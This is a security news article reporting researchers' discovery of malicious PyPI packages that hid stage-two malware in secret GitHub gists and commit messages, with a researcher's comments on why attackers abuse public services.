Source: Monticello via Shutterstock
Researchers have come across a GitHub account abusing two unique features of the site to host stage-two malware.
Hackers have increasingly been repurposing public services as headquarters for their misdeeds — housing malware in public code repositories or file-sharing services, and performing command-and-control (C2) from messaging apps. Sometimes they get even more creative, utilizing software-as-a-service (SaaS) platforms in ways you'd never be able to guess.
Continuing this tradition is yeremyvalidslov2342 (heretofore "Yeremy"), an individual connected with multiple malicious packages identified by ReversingLabs on Dec. 19. To stealthily sneak payloads past both site admins and victims, Yeremy's packages were concealed using two previously unexploited GitHub features: "gists" and commits.
New Ways of Abusing GitHub for Cyber Gain
The most common way cybercriminals will abuse public code repositories is by simply publishing their malicious files to throwaway accounts. It's obvious yet crude, as administrators work to identify and take down such accounts as soon as they're spotted.
Yeremy took a more circuitous approach, first publishing a series of packages to the Python Package Index (PyPI), another oft-abused repo. The packages were presented as honest libraries for handling network proxying, but inside their setup file lay a Base64-encoded string concealing a URL, which pointed to a secret GitHub "gist."
Gists are a kind of lite version of Git repositories, designed to allow coders to store and share snippets of code without having to set up entire projects around them. They can be public or "secret": hidden from the wider public and unsearchable, but still shareable with friends and colleagues.
The secret gist inside of the PyPI packages contained stage-two malware. The researchers were only able to find one other use of gists for such a purpose, buried in a 2019 Trend Micro report about a Slack backdoor.
Yeremy was also connected to one other PyPI package with a malicious setup file. This time upon execution, the package cloned an existing, most likely legitimate, PySocks project from GitHub. Instead of being within the repo itself, in this case, the malware was hidden inside of the commit message describing it.
How Public Services Help Hackers
Carrying out cyberattacks from one's own infrastructure does offer a certain degree of resiliency from account takedowns, but using shared and open source resources has the advantage of stealth.
"Some malware authors are afraid of getting detected," notes Karlo Zanki, the author of Tuesday's report. But, he adds, "if malicious code is properly obfuscated, public services aren't so good at detecting it."
"Package repositories like npm and PyPI receive thousands of daily packages," he continues, "and there isn't an easy way to monitor and analyze them. Some repositories do scanning with traditional antivirus solutions, but very often malicious packages get past those basic defenses. So they have limited resources, and it's not likely that they will have money or motivation to make everything that gets published secure. It's up to users of those packages to protect themselves."
Public software services also offer a host of extra upsides for bad guys. It's quicker, easier, and cheaper to create an account on a popular website than it is to arrange traditional infrastructure. The company supporting the site handles maintenance and uptime, and they're typically very reliable. Traffic to popular sites elicits far less suspicion than does traffic to unknown servers in far-off countries. Plus, what's the harm if a malicious account gets taken down? Just create a new one.
"If I were a malicious actor," Zanki concludes, "I would definitely not waste my time on running my own infrastructure."